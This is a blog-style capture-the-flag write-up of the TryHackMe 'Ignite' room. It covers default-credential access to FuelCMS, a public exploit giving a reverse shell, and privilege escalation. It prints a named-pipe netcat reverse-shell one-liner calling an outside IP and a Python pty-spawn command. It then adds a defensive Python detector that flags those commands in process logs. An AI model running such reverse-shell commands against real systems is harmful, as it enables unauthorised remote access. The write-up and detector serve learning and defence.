security portfolio + blog

by Nicholas Coleman

12 April 2025

Ignite

Info

IP: 10.10.233.34

Nmap

[image: nmap scan output]

Website:

[image: website]

Gobuster:

[image: gobuster output]

Exploits:

[image: exploit]

Since the admin did not change the default password, I can simply log in without having to brute-force or guess anything.

The admin page is located at: http://10.10.233.34/fuel

This brings me to a CMS, where there is very little information.

I decide to try a public exploit for FuelCMS that I found, which gives me a reverse shell.

[image: reverse shell]

Bingo!

[image: bingo]

I was able to find the user.txt flag pretty easily.

Looking around, I was able to find a database file:

[image: database file]

Root user found! Now I have to escalate.

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.6.25.18 4242 > /tmp/f

The following command spawns a proper TTY so that I can log in as root. It works because Python is installed on the target.

python -c 'import pty; pty.spawn("/bin/sh")'
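From the defender's side, the two commands above leave a recognisable footprint in process command lines. As an added example (not part of the original writeup), this small Python detector classifies command lines from an auditd or EDR process export; the sample export is constructed, with the writeup's own two commands as the positive cases:

```python
import re

# Indicators for the two commands in this writeup (named-pipe netcat reverse shell and
# Python pty upgrade), matched against process command lines from auditd or an EDR export.
MKFIFO_RE = re.compile(r"\bmkfifo\s+([^\s;|&]+)")
INTERACTIVE_SHELL_RE = re.compile(r"(?:^|[\s|;&])(?:/bin/|/usr/bin/)?(?:ba|da|z)?sh\s+-i\b")
NETCAT_RE = re.compile(r"(?:^|[\s|;&])(?:nc|ncat|netcat)(?:\s+-\w+)*\s+(\S+)\s+(\d{1,5})\b")
PTY_SPAWN_RE = re.compile(r"\bpty\.spawn\(")

# Constructed sample export (user<TAB>cmdline): the writeup's two commands plus benign noise.
SAMPLE_LOG = (
    "www-data\trm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.6.25.18 4242 > /tmp/f\n"
    "www-data\tpython -c 'import pty; pty.spawn(\"/bin/sh\")'\n"
    "ubuntu\tmkfifo /var/run/app.fifo\n"
    "root\tls -la /tmp\n"
)

def classify(cmdline: str) -> dict:
    """Return the indicators found in one command line plus an overall verdict."""
    hits = {}
    fifo = MKFIFO_RE.search(cmdline)
    if fifo:
        hits["mkfifo"] = fifo.group(1)
        # The same path is also a redirect target: stdin/stdout are looped through the fifo.
        if re.search(r">\s*" + re.escape(fifo.group(1)) + r"\b", cmdline):
            hits["fifo_loop"] = True
    if INTERACTIVE_SHELL_RE.search(cmdline):
        hits["interactive_shell"] = True
    nc = NETCAT_RE.search(cmdline)
    if nc:
        hits["netcat_peer"] = f"{nc.group(1)}:{nc.group(2)}"  # remote end, for triage
    if PTY_SPAWN_RE.search(cmdline):
        hits["pty_spawn"] = True
    if "netcat_peer" in hits and "interactive_shell" in hits:
        verdict = "reverse_shell"  # shell wired to a network socket
    elif "pty_spawn" in hits:
        verdict = "tty_upgrade"  # typical post-exploitation step
    elif hits.keys() - {"mkfifo"}:
        verdict = "suspicious"  # partial match, worth a look
    else:
        verdict = "benign"  # a lone mkfifo is normal for daemons
    return {"verdict": verdict, "indicators": hits}

def scan(log: str) -> list:
    # Classify each user<TAB>cmdline line of an export and return the non-benign ones.
    alerts = []
    for user, _, cmd in (line.partition("\t") for line in log.splitlines()):
        result = classify(cmd)
        if result["verdict"] != "benign":
            alerts.append({"user": user, **result})
    return alerts
```

Running scan(SAMPLE_LOG) yields two alerts for www-data, a reverse_shell with peer 10.6.25.18:4242 and a tty_upgrade; a web-server account spawning an interactive shell at all is the condition worth alerting on in practice.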

[image: root shell]

tags: tryhackme